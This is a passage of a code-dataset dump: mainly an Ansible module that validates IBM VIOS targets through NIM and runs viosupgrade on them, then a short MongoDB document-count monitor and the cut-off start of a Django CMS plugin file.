----------------------------------------------------------------\ndef build_viosupgrade_cmd(vios, validate):\n\n \"\"\"\n Build the viosupgrade command for a specific vios\n with apropriate parameters in a restricted use.\n\n viosupgrade -t bosinst -n hostname -m mksysbname -p spotname\n {-a RootVGCloneDisk: ... | -s} [-c] [-e Resources: ...] [-v]\n\n viosupgrade -t altdisk -n hostname -m mksysb_name -a RootVGCloneDisk\n [-c] [-e Resources: ...] [-v]\n\n Used Flags:\n -t Specifies the type of install. 
Supported types are: bosinst, altdisk.\n -n Specifies the target VIOS hostname or IP address to perform VIOS upgrade operation.\n -m Specifies the MKSYSB resource name.\n -p Specifies the SPOT resource name.\n -a Specifies the alternate physical volume. if install type is 'bosinst' then\n the disk(s) will be used to take backup of current rootvg.\n For 'altdisk' type installation disk(s) will be used to install the provided image.\n -s Specify to skip cloning of the current rootvg disk(s) to alternate disk(s).\n -c Specify if VIOS is part of the cluster.\n -e Specifies configuration resource(s) to apply as part of the installation.\n supported resources are resolv_conf, script, fb_script, file_res, image_data, log.\n -v Validates the input data for the given VIO Server(s).\n\n Not Used Flags:\n -b Specifies VIOS configuration backup file resource name.\n -r Specifies the new rootvg physical volume to install the provided image.\n -f Specifies file name which contains the list of nodes.\n -q Check the status of triggered upgrade operation.\n\n Arguments:\n vios: {} Dictionary of attributes for the vios object\n validate: boolean\n\n return: string command with flags and parameters\n \"\"\"\n cmd = '/usr/sbin/viosupgrade -t {} -n {} -m {} '\\\n .format(vios[\"action\"], vios[\"name\"], vios[\"ios_mksysb\"])\n if vios[\"action\"] == \"bosinst\":\n cmd = cmd + \" -p \" + vios[\"spot\"]\n if len(vios[\"user_res\"]) != 0:\n cmd = cmd + \" -e \"\n for res in vios[\"user_res\"]:\n cmd = cmd + res + \":\"\n if vios[\"cluster_id\"] != \"\":\n cmd = cmd + \" -c\"\n\n if vios[\"alt_disk\"] != \"\":\n cmd = cmd + \" -a \" + re.sub(' +', ':', vios[\"alt_disk\"])\n elif vios[\"skip\"] is True:\n cmd = cmd + \" -s\"\n if validate:\n cmd = cmd + \" -v\"\n return cmd\n\n\n# ----------------------------------------------------------------\ndef validate_vios(module, vios):\n \"\"\"\n Validate the execution of the viosupgrade command\n Arguments:\n module: {} dictionary\n vios: {} 
dictionary of attributes of vios object\n Return: integeger 0 --> OK !=0 --> NOK\n \"\"\"\n global ERROR\n global READY\n\n rc = 0\n cmd = build_viosupgrade_cmd(vios, validate=True)\n (rc, std_out, std_err) = exec_cmd(cmd, module, shell=True)\n if rc != 0:\n msg = 'Viosupgrade error on vios: {} :{}:{}'\\\n .format(vios[\"name\"], std_out, std_err)\n logging.error(msg)\n vios[\"status\"] = ERROR\n else:\n vios[\"status\"] = READY\n return rc\n\n\n# ----------------------------------------------------------------\ndef validate_tuple(module, tuple, tuple_key, upgrade_status):\n \"\"\"\n validate the execution of viosupgrade command for a list of vios\n beloonging to the same cluster or deserving the same lpar\n and set the result in upgrade_status dict\n\n Arguments:\n module:\n tuple: {} dictionary ov vioses\n tuple_key: String: \"vioses with space separator\"\n upgrade_status: {} key: tuple_key, value:tuple status\n Return: Integer 0 --> OK\n \"\"\"\n rc = 0\n for vios in tuple.values():\n rc = validate_vios(module, vios)\n if rc != 0:\n upgrade_status[tuple_key] = ERROR\n return rc\n upgrade_status[tuple_key] = READY\n return rc\n\n\n# ----------------------------------------------------------------\ndef viosupgrade(module, tuples, upgrade_status):\n \"\"\"\n Execute the viosupgrade command on all vios of all targets selected\n in the tuples dictionary\n In parallel all targets but sequentialy each vios of one target\n set the status of tuples in upgrade_status dict\n Arguments:\n module: {}\n tuples: {}\n upgrade_status: {}\n Return: Integer: number of error\n \"\"\"\n global CHANGED\n global ERROR\n global READY\n global RUNNING\n global DONE\n TIMEOUT = 5400 # 1 H 30 Min\n LOOP_TIME = 90 # 1 Min 30 Sec\n nb_error = 0\n CONTINUE = True\n while CONTINUE: # continue while at least one tuple is not done even not in error\n loop_start = int(time.time())\n CONTINUE = False\n for tuple_key in tuples.keys():\n tuple = tuples[tuple_key]\n if upgrade_status[tuple_key] == 
ERROR or upgrade_status[tuple_key] == DONE:\n continue # go to next tuple\n elif upgrade_status[tuple_key] == READY:\n validate_tuple(module, tuple, tuple_key, upgrade_status)\n if upgrade_status[tuple_key] == ERROR:\n continue # go to next tuple\n CONTINUE = True\n vioses = tuple_key.split()\n nb_vioses = len(vioses)\n for index, vios_name in enumerate(vioses):\n vios = tuple[vios_name]\n previous_vios = {}\n if index != 0:\n previous_vios = tuple[vioses[index - 1]]\n # if vios is ready ant it is the first or the previous is done\n # then start migration\n if vios[\"status\"] == READY:\n if index == 0 or previous_vios[\"status\"] == DONE:\n # now run the upgrade command.\n cmd = build_viosupgrade_cmd(vios, False)\n (ret, std_out, std_err) = exec_cmd(cmd, module, shell=True)\n if ret != 0:\n msg = 'Viosupgrade error on vios: {} :{}'\\\n .format(vios_name, std_err)\n logging.error(msg)\n upgrade_status[tuple_key] = ERROR\n vios[\"status\"] = ERROR\n nb_error += 1\n break # break vioses loop and go to next tuple\n upgrade_status[tuple_key] = RUNNING\n vios[\"status\"] = RUNNING\n start_time = int(time.time())\n vios[\"loop_time\"] = start_time\n vios[\"start_time\"] = start_time\n break # break vioses loop and go to next tuple\n\n # if vios is running then test real state\n if vios[\"status\"] == RUNNING:\n actual_time = int(time.time())\n # wait until LOOP_TIME in sec since last test\n if actual_time < vios[\"loop_time\"] + LOOP_TIME:\n # sleep until loop_time + LOOP_TIME in sec\n time.sleep(vios[\"loop_time\"] + LOOP_TIME - loop_start)\n actual_time = vios[\"loop_time\"] + LOOP_TIME\n # test real status an change the status if reqiured then continue\n # Query to get the status of the upgrade for each target\n status = get_viosupgrade_status(module, vios)\n if status == ERROR:\n vios[\"status\"] = ERROR\n upgrade_status[tuple_key] = ERROR\n nb_error += 1\n break\n if status == DONE:\n if get_cluster_status(module, vios) != 0:\n status = RUNNING\n vios[\"loop_time\"] 
= actual_time\n vios[\"status\"] = status\n # set tuple in error if TimeOut\n if status == RUNNING and (actual_time > vios[\"start_time\"] + TIMEOUT):\n vios[\"status\"] = ERROR\n upgrade_status[tuple_key] = ERROR\n break # break vioses loop and go to next tuple\n\n # if vios is migrated --> next vios\n if vios[\"status\"] == DONE:\n CHANGED = True\n # if last vios is migrated set tuple to migrated --> next tuple\n if index == (len(vioses) - 1):\n upgrade_status[tuple_key] = DONE\n # End of vios loop, go to the next tuple\n # else:\n # continue # loop on the next vios\n return nb_error\n\n\n###################################################################################\n\nif __name__ == '__main__':\n DEBUG_DATA = []\n OUTPUT = []\n NIM_NODE = {}\n CHANGED = False\n VARS = {}\n ERROR = \"UPGRADE-FAILURE\"\n READY = \"READY-FOR-UPGRADE\"\n RUNNING = \"RUNNING\"\n DONE = \"UPGRADE-SUCCESS\"\n REJECTED = \"UPGRADE-REJECTED\"\n nb_error = 0\n\n MODULE = AnsibleModule(\n argument_spec=dict(\n description=dict(required=False, type='str'),\n\n # IBM automation generic attributes\n targets=dict(required=True, type='list'),\n actions=dict(required=True, type='dict'),\n vars=dict(required=False, type='dict'),\n vios_status=dict(required=False, type='dict'),\n nim_node=dict(required=False, type='dict'),\n\n # following attributes are dictionaries with\n # key: 'all_vios' or hostname and value: a string or boolean\n # example:\n # ios_mksysb={\"target1\": \"mksysb_name_1\", \"target2\": \"mksysb_name_2\"}\n # ios_mksysb={\"all_vios\": \"mksysb_name\", \"target2\": \"mksysb_name_2\"}\n ios_mksysb=dict(required=True, type='dict'),\n # force={\"all_vios\": False, \"target_x\": True}\n force=dict(required=False, type='dict'),\n alt_disk=dict(required=False, type='dict'),\n # Resources (-e option) The valid resource type are:\n # resolv_conf, script, fb_script, file_res, image_data, and log\n # Dictionary with key: 'all_vios' or hostname and value: string\n # exemple: 
user_res={\"all_vios\": \"resolv_conf_name\", \"vios_name\": \"file_res_name\"}\n # in that exemple the viosupgrade will be called with -e resolv_conf_name:file_res_name\n user_res=dict(required=False, type='dict'),\n ),\n )\n\n # =========================================================================\n # Get Module params\n # =========================================================================\n\n msg = \"\"\n user_res = {}\n alt_disk = {}\n VERBOSITY = MODULE._verbosity\n\n targets = MODULE.params['targets']\n actions = MODULE.params['actions']\n ios_mksysb = MODULE.params['ios_mksysb']\n force = MODULE.params['force']\n nim_user_res = []\n REQUIRED_IOSLEVEL = \"2.2.6.30\"\n # Handle playbook variables\n LOGNAME = '/tmp/ansible_upgradeios_debug.log'\n if MODULE.params['vars']:\n VARS = MODULE.params['vars']\n if'log_file' in VARS.keys():\n LOGNAME = VARS['log_file']\n if MODULE.params['vios_status']:\n tuples_status = MODULE.params['vios_status']\n else:\n vios_status = None\n # Open log file\n OUTPUT.append('Log file: {}'.format(LOGNAME))\n LOGFRMT = '[%(asctime)s] %(levelname)s: [%(funcName)s:%(thread)d] %(message)s'\n LEVEL = logging.DEBUG\n \n logging.basicConfig(filename='{}'.format(LOGNAME), format=LOGFRMT, level=LEVEL)\n\n logging.debug('*** START NIM VIOSUPGRADE OPERATION ***')\n all_targets = list(set(targets)) # remove duplicates tuples\n all_targets = [elem.replace(',', ' ').replace(':', ' ') for elem in all_targets]\n all_targets = [re.sub(' +', ' ', elem) for elem in all_targets]\n logging.debug('VIOSUpgrade operation for tagets:{}'.format(targets))\n logging.info('VERBOSITY is set to {}'.format(VERBOSITY))\n OUTPUT.append('VIOSUpgrade operation for {}'.format(all_targets))\n # build mksysb - spot table. 
spot is needed (if action = bosinst)\n mksysb_htab = get_ios_mksysb(MODULE)\n # build NIM node info (if needed)\n if MODULE.params['nim_node']:\n NIM_NODE = MODULE.params['nim_node']\n else:\n NIM_NODE['nim_vios'] = get_nim_clients_info(MODULE)\n logging.debug('NIM VIOS: {}'.format(NIM_NODE['nim_vios']))\n if MODULE.params['user_res']:\n user_res = MODULE.params['user_res']\n # get all existing user_res from nim server\n # The valid types are: resolv_conf, script, fb_script, file_res, image_data, and log.\n nim_user_res = get_nim_user_res(MODULE)\n if MODULE.params['alt_disk']:\n alt_disk = MODULE.params['alt_disk']\n\n # if health check status is known remove tuple with wrong status\n # build the list of target matching nim client list\n # remove duplicates vios\n # check vios connectivity and get ClusterID\n # get altinst_rootvg disk\n # remove tuples without c_rsh connectivity\n # exclude tuples with different clusterID\n # remove tuple having the same clusterID than an other tuple\n # remove tuple having unsuficient ioslevel\n logging.debug(\"ALL_TARGETS = {}\".format(all_targets))\n new_target_list = []\n all_vioses = []\n all_cluster_ids = []\n\n # build here the targets tuple structure\n tuples = {}\n # tuples = {} # Dict: key = tuple ex: \"vios1 vios2\"\n # tuples[tuple] = {} # Dict: key = vios_name ex: \"vios1\" or \"vios2\"\n # tuples[tuple][vios_name] = {} # Dict: keys are \"name\", \"cluster_id\", \"ios_mksysb\"...\n # tuples[tuple][vios_name][\"name\"] = \"\" # String: \n # tuples[tuple][vios_name][\"host_name\"] = \"\" # String: get from nim object\n # tuples[tuple][vios_name][\"ip\"] = \"\" # String: ip adress coresponding to host_name\n # tuples[tuple][vios_name][\"interface\"] = \"\" # String: interface configured wit ip\n # tuples[tuple][vios_name][\"cluster_id\"] = \"\" # String: \n # tuples[tuple][vios_name][\"altinst_rootvg\"] = \"\" # String: \n # tuples[tuple][vios_name][\"rootvg\"] = \"\" # String: \n # tuples[tuple][vios_name][\"level\"] = 
\"\" # String: \n # tuples[tuple][vios_name][\"free_pv\"] = {} # Dict: key = disk value = size\n # tuples[tuple][vios_name][\"skip\"] = Boolean: skip the alt disk copy operation\n # tuples[tuple][vios_name][\"action\"] = \"\" # String: \n # tuples[tuple][vios_name][\"ios_mksysb\"] = \"\" # String: \n # tuples[tuple][vios_name][\"spot\"] = \"\" # String: \n # tuples[tuple][vios_name][\"alt_disk\"] = \"\" # String: \n # tuples[tuple][vios_name][\"user_res\"] = [] # Liste of resource name\n # tuples[tuple][vios_name][\"status\"] = \"\" # String: status to follow installation steps\n # tuples[tuple][vios_name][\"start_time\"] = 0 # Integer: viosupgrade start time from epoch\n # tuples[tuple][vios_name][\"loop_time\"] = 0 # Integer: viosupgrade start time from epoch\n\n upgrade_status = {} # the key is the tuple string ex: \"vios1 vios2\"\n for tuple_key in all_targets:\n tuple = {}\n vioses = tuple_key.split()\n msg = \"\"\n cluster_id = \"\"\n\n if not (vios_status is None):\n if len(vioses) == 1 and vioses[0] in vios_status\\\n and vios_status[vioses[0]] != 'SUCCESS-HC'\\\n and ios_status[vioses[0]] != 'SUCCESS-ALTDC':\n OUTPUT.append(\" {} vios skiped ({})\"\n .format(vioses[0], vios_status[vioses[0]]))\n logging.warn(\"{} vios skiped ({})\"\n .format(vioses[0], vios_status[vioses[0]]))\n upgrade_status[tuple_key] = vios_status[vioses[0]]\n continue\n if len(vioses) == 2:\n key1 = vioses[0] + \"-\" + vioses[1]\n key2 = vioses[1] + \"-\" + vioses[0]\n if key1 in vios_status.keys()\\\n and vios_status[key1] != 'SUCCESS-HC'\\\n and vios_status[key1] != 'SUCCESS-ALTDC':\n OUTPUT.append(\" {} vioses skiped ({})\"\n .format(tuple_key, vios_status[key1]))\n logging.warn(\"{} vioses skiped ({})\"\n .format(tuple_key, vios_status[key1]))\n upgrade_status[tuple_key] = vios_status[key1]\n continue\n if key2 in vios_status.keys()\\\n and vios_status[key2] != 'SUCCESS-HC'\\\n and vios_status[key2] != 'SUCCESS-ALTDC':\n OUTPUT.append(\" {} vioses skiped ({})\"\n 
.format(tuple_key, vios_status[key2]))\n logging.warn(\"{} vioses skiped ({})\"\n .format(tuple_key, vios_status[key2]))\n vios_status[key1] = vios_status[key2]\n upgrade_status[tuple_key] = vios_status[key2]\n continue\n else:\n OUTPUT.append(\" {} vioses skiped (no previous status found)\"\n .format(key1))\n logging.warn(\"{} vioses skiped (no previous status found)\"\n .format(key1))\n upgrade_status[tuple_key] = \"FAILURE-NO-PREV-STATUS\"\n\n for vios_name in vioses:\n msg = \"\"\n vios = {}\n vios[\"name\"] = vios_name\n vios[\"status\"] = READY\n vios[\"altinst_rootvg\"] = \"\"\n vios[\"rootvg\"] = \"\"\n vios[\"alt_disk\"] = \"\"\n vios[\"cluster_id\"] = \"\"\n vios[\"host_name\"] = \"\"\n vios[\"ip\"] = \"\"\n vios[\"interface\"] = \"\"\n vios[\"interface_type\"] = \"\"\n vios[\"cluster_status\"] = \"\"\n vios[\"skip\"] = False\n vios[\"level\"] = \"\"\n vios[\"start_time\"] = 0\n vios[\"loop_time\"] = 0\n vios[\"free_pv\"] = {}\n tuple[vios_name] = vios\n\n if vios_name not in NIM_NODE['nim_vios']:\n msg = \"vios: {} is not a nim client.\".format(vios_name)\n upgrade_status[tuple_key] = \"UNKNOWN-NIM-CLIENT\"\n if vios_name in all_vioses:\n msg = \"vios: {} is already in the list of targets.\"\\\n .format(vios_name)\n upgrade_status[tuple_key] = \"DUPLICATE-VIOS\"\n if msg:\n vios[\"status\"] = upgrade_status[tuple_key]\n break # vios loop\n\n cluster_id = \"\"\n vios[\"host_name\"] = NIM_NODE['nim_vios'][vios_name][\"vios_ip\"]\n # get dominized host_name and ip @ of the vios\n cmd = 'LC_ALL=C /bin/host {}'.format(vios[\"host_name\"])\n (ret, std_out, std_err) = exec_cmd(cmd, MODULE, False, True, True)\n if ret != 0:\n msg = 'skip target: {}, cannot get {} ip address.'\\\n .format(tuple_key, vios_name)\n break # vios loop\n else:\n # parse stdout\n for line in std_out.split('\\n'):\n line = line.strip()\n match_key = re.match(r\"^(\\S+)\\s+\\S+\\s+(\\d+.\\d+.\\d+.\\d+)$\", line)\n if match_key:\n vios[\"ip\"] = match_key.group(2)\n rootvg_size = 0\n cmd = 
['/usr/lpp/bos.sysmgt/nim/methods/c_rsh', vios[\"host_name\"],\n '\"LC_ALL=C /etc/lsattr -El vioscluster0; /usr/bin/netstat -in;'\n ' /usr/sbin/lsdev -c adapter -t sea -s pseudo -F name:description;'\n ' /usr/ios/cli/ioscli lspv; /usr/ios/cli/ioscli ioslevel;'\n ' /usr/ios/cli/ioscli lspv -free;'\n ' /usr/ios/cli/ioscli cluster -status -field cluster_state\"']\n (ret, std_out, std_err) = exec_cmd(cmd, MODULE)\n # check vios connectivity\n if ret != 0:\n msg = 'skip target: {}, cannot reach {} with c_rsh.'\\\n .format(tuple_key, vios_name)\n break # vios loop\n else:\n # parse std_out and get clusterID, altinst_rootvg,\n # vios version, free pv, rootvg size\n for line in std_out.split('\\n'):\n line = line.strip()\n\n # search cluster_id\n if vios[\"cluster_id\"] == \"\":\n match_key = re.match(r\"^cluster_id\\s+(\\S+).*\", line)\n if match_key:\n cluster_id = match_key.group(1)\n vios[\"cluster_id\"] = cluster_id\n if cluster_id in all_cluster_ids:\n msg = '{}: an other node is allready belonginng'\\\n 'to the cluster with ID: {}.'.format(vios_name, cluster_id)\n break # parse std_out loop\n if len(vioses) > 1\\\n and vios[\"cluster_id\"] != tuple[vioses[0]][\"cluster_id\"]:\n msg = '{}: vioses belong to different cluster\"'.format(tuple_key)\n break # parse std_out loop\n continue # next line\n\n # search vios hsot interface\n if vios[\"interface\"] == \"\":\n match_key = re.match(r\"^(\\S+)\\s+\\d+\\s+\\S+\\s+(\\d+.\\d+.\\d+.\\d+)\\s+.*\", line)\n if match_key and match_key.group(2) == vios[\"ip\"]:\n interface = match_key.group(1)\n vios[\"interface\"] = interface.replace(\"en\", \"ent\")\n continue # next line\n # search SEA adapter\n if vios[\"interface_type\"] == \"\":\n match_key = re.match(r\"^(\\S+):Shared Ethernet Adapter\", line)\n if match_key and match_key.group(1) == vios[\"interface\"]:\n vios[\"interface_type\"] = \"SEA\"\n continue # next line\n\n # search altinst_rootvg and rootvg disk name\n if vios[\"altinst_rootvg\"] == \"\" or vios[\"rootvg\"] 
== \"\":\n match_key = re.match(r\"^(\\S+)\\s+(\\S+)\\s+(\\S+).*\", line)\n if match_key and match_key.group(3) == \"altinst_rootvg\":\n vios[\"altinst_rootvg\"] = match_key.group(1)\n vios[\"skip\"] = True\n continue # next line\n elif match_key and match_key.group(3) == \"rootvg\":\n if vios[\"interface_type\"] == \"\":\n vios[\"interface_type\"] = \"OTHER\" # end of search SEA section\n vios[\"rootvg\"] = match_key.group(1)\n continue # next line\n\n # search vios level\n if vios[\"level\"] == \"\":\n match_key = re.match(r\"^(\\d+.\\d+.\\d+.\\d+)$\", line)\n if match_key:\n if match_key.group(1) >= REQUIRED_IOSLEVEL:\n vios[\"level\"] = match_key.group(1)\n else:\n msg = '{} ioslevel is {}, '\\\n 'the minimum required is {}'\\\n .format(vios_name, match_key.group(1), REQUIRED_IOSLEVEL)\n break # parse std_out loop\n continue # next line\n\n # search free pv\n match_key = re.match(r\"^(\\S+)\\s+(\\S+)\\s+(\\d+)$\", line)\n if match_key:\n vios[\"free_pv\"][match_key.group(1)] = int(match_key.group(3), 10)\n continue # next line\n\n # get cluster status\n match_key = re.match(r\"^Cluster\\s+State:\\s+(\\S+)$\", line)\n if match_key:\n vios[\"cluster_status\"] = match_key.group(1)\n continue # next line\n elif line == \"Cluster does not exist.\":\n vios[\"cluster_status\"] = \"UNKOWN\"\n continue # next line\n # end annalysis of command output\n\n if vios[\"cluster_id\"] and vios[\"cluster_status\"] != \"OK\":\n msg = '{}, the cluster is not in the correct state to be upgraded.'\\\n .format(tuple_key)\n if msg:\n break # vios loop\n\n cmd = ['/usr/lpp/bos.sysmgt/nim/methods/c_rsh', vios[\"host_name\"],\n '\"LC_ALL=C /usr/sbin/lqueryvg -p {} -At\"'.format(vios[\"rootvg\"])]\n (ret, std_out, std_err) = exec_cmd(cmd, MODULE)\n # check vios connectivity\n if ret != 0:\n msg = 'skip target: {}, cannot reach {} with c_rsh.'\\\n .format(tuple_key, vios_name)\n break # vios loop\n else:\n total_pps = 0\n free_pps = 0\n pp_size = 0\n for line in std_out.split('\\n'):\n 
line = line.strip()\n # search rootvg size\n match_key = re.match(r\"^PP Size:\\s+(\\d+).*\", line)\n if match_key:\n pp_size = int(match_key.group(1))\n match_key = re.match(r\"^Total PPs:\\s+(\\S+).*\", line)\n if match_key:\n total_pps = int(match_key.group(1))\n match_key = re.match(r\"^Free PPs:\\s+(\\S+).*\", line)\n if match_key:\n free_pps = int(match_key.group(1))\n if pp_size == 0 or total_pps == 0:\n msg = \"Program Error\"\n else:\n # root vg size in Megabytes\n rootvg_size = (total_pps - free_pps) * (2 ** (pp_size - 20)) # in Megabytes\n\n if msg:\n vios[\"status\"] = REJECTED\n break # vios loop\n\n force_install = False # default value\n disks = \"\"\n action = \"\"\n mksysb = \"\"\n vios[\"user_res\"] = []\n if vios_name in force.keys():\n force_install = force[vios_name]\n elif \"all_vios\" in force.keys():\n force_install = force[\"all_vios\"]\n\n if vios_name in ios_mksysb.keys():\n mksysb = ios_mksysb[vios_name]\n elif \"all_vios\" in ios_mksysb.keys():\n mksysb = ios_mksysb[\"all_vios\"]\n else:\n msg = '{}: no ios_mksysb property specified.'\\\n .format(vios_name)\n break # vios loop\n vios[\"ios_mksysb\"] = mksysb\n if mksysb not in mksysb_htab.keys():\n msg = '{}: The specified ios_mksysb: {} resource does not exist'\\\n .format(vios_name, mksysb)\n break # vios loop\n elif mksysb_htab[mksysb][\"ioslevel\"] < \"3.1.0.0\":\n msg = '{}: the ios_mksysb level: {} {}, is insufficient.'\\\n ' The minimum level is 3.1.0.0'\\\n .format(vios_name, mksysb, mksysb_htab[mksysb][\"ioslevel\"])\n break # vios loop\n elif mksysb_htab[mksysb][\"ioslevel\"] < vios[\"level\"] and not force_install:\n msg = '{}: the ios_mksysb level {} {} should be greater than vios level {}.'\\\n .format(vios_name, mksysb, mksysb_htab[mksysb][\"ioslevel\"], vios[\"level\"])\n break # vios loop\n elif mksysb_htab[mksysb][\"ioslevel\"] == vios[\"level\"] and not force_install:\n msg = '{}: the ios_mksysb level {} {} should be greater than vios level {}.'\\\n .format(vios_name, 
mksysb, mksysb_htab[mksysb][\"ioslevel\"], vios[\"level\"])\n break # vios loop\n if vios_name in actions.keys():\n action = actions[vios_name]\n elif \"all_vios\" in actions.keys():\n action = actions[\"all_vios\"]\n else:\n msg = '{}: atcion property must be specified.'\\\n .format(vios_name)\n break # vios loop\n vios[\"action\"] = action\n if action != \"bosinst\" and action != \"altdisk\":\n msg = '{}: action type should be bosinst or altdisk.'\\\n .format(vios_name)\n break # vios loop\n\n # a bosinst installation type needs a spot resource.\n if action == 'bosinst':\n if \"spot\" in mksysb_htab[mksysb].keys():\n vios[\"spot\"] = mksysb_htab[mksysb][\"spot\"]\n else:\n msg = '{}: There is no defined spot for ios_mksysb '\\\n 'resource: {}, the bosinst installation required one.'\\\n .format(vios_name, mksysb)\n break # vios loop\n # an aldisk installation requires that the ip interface is configured on a non SEA\n elif vios[\"interface_type\"] == \"SEA\":\n msg = '{}: altdisk method is not supported on a VIOS defined with SEA interface.'\\\n .format(vios_name)\n break # vios loop\n res_list = []\n if vios_name in user_res.keys():\n res_list = user_res[vios_name].replace(':', ' ').replace(',', ' ').split()\n if \"all_vios\" in user_res.keys():\n res_list.extend(user_res[\"all_vios\"].replace(':', ' ').replace(',', ' ').split())\n res_list = list(set(res_list))\n vios[\"user_res\"] = res_list\n for res in res_list:\n if res not in nim_user_res.keys():\n msg = '{}: the resource {} does not exist or is not '\\\n 'an authorized nim resource.'\\\n .format(vios_name, res)\n break\n if action == 'altdisk' and nim_user_res[res] == \"file_res\":\n msg = '{}: the resource {} of type file_res is not '\\\n 'supported for altdisk type installation.'\\\n .format(vios_name, res)\n logging.warning(msg)\n if msg:\n break # vios loop\n\n if vios_name in alt_disk.keys():\n disks = alt_disk[vios_name].strip()\n elif \"all_vios\" in alt_disk.keys():\n disks = 
alt_disk[\"all_vios\"].strip()\n if disks:\n disks = disks.replace(':', ' ').replace(',', ' ').strip()\n vios[\"alt_disk\"] = disks\n if not disks and action == 'altdisk':\n msg = '{}: No alt_disk property is specified.'\\\n .format(vios_name)\n break # vios loop\n elif not disks:\n if not vios[\"altinst_rootvg\"]:\n msg = '{}: The bosinst operation requires an altinst_rootvg.'\\\n 'Create one or add the alt_disk property for this node.'\\\n .format(vios_name)\n break # vios loop\n else:\n vios[\"skip\"] = True\n\n # Reject vios and tuple if altinst_rootvg already exists\n # and alt_disk property is specified\n elif disks and vios[\"altinst_rootvg\"]:\n msg = '{}: altinst_rootvg already exist, rename it.'.format(vios_name)\n if action == 'bosinst':\n msg += ' Or remove the alt_disk property.'\n\n # test if alt_disks are free.\n # test the total size of alt_disks is enhougth for installation or clonne rootvg\n elif disks:\n d_lsit = disks.split()\n total_size = 0\n for disk in d_lsit:\n if disk in vios[\"free_pv\"].keys():\n total_size += vios[\"free_pv\"][disk]\n else:\n msg = '{}: the specified disk {} is not free'\\\n .format(vios_name, disk)\n break # test disk loop\n if msg:\n break # vios loop\n if total_size < 30720 and action == \"altdisk\":\n msg = '{}: The total size of alternate disk(s) {}: {} '\\\n 'is less than 30G. 
Choose disk(s) with adequate size.'\\\n .format(vios_name, disks, total_size)\n elif action == 'bosinst' and total_size < rootvg_size:\n msg = '{}: The total size of alternate disk(s) {}: {} '\\\n 'is less than the actual rootvg size {}.'\\\n 'Choose disk(s) with adequate size.'\\\n .format(vios_name, disks, total_size, rootvg_size)\n if msg:\n break # vios loop\n vios[\"skip\"] = False\n # end management disk size\n # end vios loop\n if msg:\n logging.warning(msg)\n OUTPUT.append(msg)\n msg = \"Then the \\\"{}\\\" target will not be selected for upgrade operation\"\\\n .format(tuple_key)\n logging.warning(msg)\n OUTPUT.append(msg)\n logging.debug('Rejected vios tuple: {}: {}'.format(tuple_key, tuple))\n vios[\"status\"] = REJECTED\n upgrade_status[tuple_key] = REJECTED\n else:\n all_vioses.extend(vioses)\n upgrade_status[tuple_key] = DONE\n for vios_name in vioses:\n if tuple[vios_name][\"status\"] == READY:\n upgrade_status[tuple_key] = READY\n tuples[tuple_key] = tuple\n if cluster_id:\n all_cluster_ids.append(cluster_id)\n break\n # end tuple loop\n\n logging.debug('Remaining TARGETS={}'.format(tuples))\n\n MODULE.targets = all_targets\n OUTPUT.append('Remaining Targets list:{}'.format(tuples.keys()))\n\n if len(tuples.keys()) == 0:\n msg = 'All targets have been rejected. 
It remains no thing to do!'\n OUTPUT.append(msg)\n if VERBOSITY == 3:\n MODULE.exit_json(\n changed=False,\n msg=msg,\n nim_node=NIM_NODE,\n targets=MODULE.targets,\n debug_output=DEBUG_DATA,\n output=OUTPUT,\n status=upgrade_status)\n else:\n MODULE.exit_json(\n changed=False,\n msg=msg,\n output=OUTPUT,\n status=upgrade_status)\n\n nb_error = viosupgrade(MODULE, tuples, upgrade_status)\n\n # Prints vios status for each targets\n for tuple_key in upgrade_status:\n status = upgrade_status[tuple_key]\n msg = 'VIOSUpgrade operation on target: \"{}\" end with status: {}.'\\\n .format(tuple_key, status)\n OUTPUT.append(msg)\n logging.info(msg)\n if status == DONE or status == ERROR:\n for vios_name in tuple_key.split():\n msg = 'VIOSUpgrade {} operation status on \"{}\": {}.'\\\n .format(tuples[tuple_key][vios_name][\"action\"], vios_name,\n tuples[tuple_key][vios_name][\"status\"])\n logging.info(msg)\n OUTPUT.append(msg)\n\n # Prints a global result statement\n if nb_error == 0:\n msg = 'NIM VIOSUpgrade operation completed successfully'\n OUTPUT.append(msg)\n logging.info(msg)\n else:\n msg = 'VIOSUpgrade operation failed: {} errors'.format(nb_error)\n OUTPUT.append(msg)\n logging.error(msg)\n\n # # =========================================================================\n # # Exit\n # # =========================================================================\n if nb_error == 0:\n if VERBOSITY == 3:\n MODULE.exit_json(\n changed=CHANGED,\n msg=msg,\n nim_node=NIM_NODE,\n targets=MODULE.targets,\n debug_output=DEBUG_DATA,\n output=OUTPUT,\n status=upgrade_status)\n else:\n MODULE.exit_json(\n changed=CHANGED,\n msg=msg,\n targets=MODULE.targets,\n output=OUTPUT,\n status=upgrade_status)\n else:\n MODULE.fail_json(\n changed=CHANGED,\n msg=msg,\n targets=MODULE.targets,\n debug_output=DEBUG_DATA,\n output=OUTPUT,\n 
status=upgrade_status)\n","sub_path":"library/aix_nim_viosupgrade.py","file_name":"aix_nim_viosupgrade.py","file_ext":"py","file_size_in_byte":49206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"395290888","text":"import pymongo\n\nimport time\nfrom jianwei.pipelines import MongoPipeline\n\nmonitor = MongoPipeline('mongodb://localhost:27017', 'jianwei')\nmonitor_db = monitor.db\nnewest_name = max(monitor_db.list_collection_names())\nmongo_clt = monitor.db[newest_name]\nstart_time = time.time()\nwhile True:\n used_time = time.time() - start_time\n\n print('Time: %6.2f min, Documents stacked: %6d in collection %s'\n % (used_time/60, mongo_clt.count_documents({}), mongo_clt.name))\n time.sleep(5)\n\n '''After Main Procedure starts, then start it, for waiting reading the MongoDB'''\n\n","sub_path":"files/monitor_spider.py","file_name":"monitor_spider.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"9439433","text":"from __future__ import unicode_literals\n\nfrom django import forms\nfrom django.db import models\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom cms.models import CMSPlugin\nfrom cms.plugin_pool import plugin_pool\nfrom cms.plugin_base import CMSPluginBase\n\nfrom sections.cms_plugins import WrapPluginForm, WrapPlugin\nfrom sections.models import Wrap\nfrom baseplugin.utils import get_indicator_hidden\n\nfrom . 
